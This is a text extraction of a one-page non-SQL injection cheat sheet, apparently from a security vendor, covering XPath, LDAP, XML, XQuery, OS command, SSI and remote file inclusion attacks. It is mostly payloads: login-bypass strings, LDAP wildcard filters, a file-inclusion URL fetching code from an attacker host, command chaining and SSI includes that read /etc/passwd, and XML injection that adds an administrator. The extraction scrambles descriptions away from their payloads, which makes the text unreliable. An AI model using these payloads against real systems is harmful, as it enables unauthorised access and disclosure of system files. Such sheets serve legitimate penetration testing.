INJECTION CHEATSHEET (non-SQL)

www.ntobjectives.com XPATH Injection Detection Exploitation or 1=1 or = ] | * | user[@role=admin NODENAME //NODENAME NODENAME//SUBNODENAME //NODENAME/[NAME=VALUE] http://site.com/login. aspx?username=foo or 1=1 or = LDAP Injection Detection ( ) | & ! Exploitation (&(param1=val1)(param2=val2)) (|(param1=val1)(param2=val2)) *)(ObjectClass=*)) (&(objectClass=void void)(ObjectClass=void)) (&(objectClass=void http://site.com/ldapsearch?user=* Remote Code Injection Upload File Upload file PHP, JSP, ASP etc. execution! Remote file inclusion/injection include($incfile); PHP call Injecting http://site.com/page.php?file=http://www.attacker.com/exploit Injecting active content Access back from webroot AND operator OR operator Blind LDAP Injection using AND operator BLIND LDAP Injection using OR operator Displays list of all users with attributes opening bracket closing bracket Pipe - OR operator for LDAP Ampersand - AND operator for LDAP Exclamation - NOT operator for LDAP returns all children of node returns all elements in the document returns all SUBNODE under NODE element returns all NODE that have a NAME child equal to VALUE Login bypass single quote double quote

XML Injection Detection <> <!--/--> & <![CDATA[ / ]]> Exploitation <!-- EXISTING TAG --> http://www.example.com/addUser.php? username=dan&password=123456<!-email: --><userid>0</userid><mail>foo@ emaildomain.com OS Command Injection Detection | <ANOTHER COMMAND> ; <ANOTHER COMMAND> Exploitation %<ENV VARIABLE>% & ://site.com/whois.php?domain=foobar; echo+/etc/passwd XQuery Injection Detection Exploitation or <ATTACK> or .= something or = http://site.com/xmlsearch?user=foo or = SSI Injection Detection include, echo, exec .SHTML Exploitation < ! # = / . - > and [a-zA-Z0-9] http://site.com/ssiform.php?showfile=<!-#include virtual=/etc/passwd --> Required characters for successful execution Displays content of /etc/passwd file <!--#include virtual=<SOME SYSTEM FILE > --> Look for word File extension Displays list of all users with attributes single quote double quote Windows only Running command in background (*NIX Only) Displays content of /etc/passwd file Pipe - On *NIX Output of first command to another, In Windows multiple commands execution semicolon - Running two commands together New value of existing tag along with tag name Add user as administrator single quote double quote angular parentheses XML Comment tag ampersand CDATA section delimiters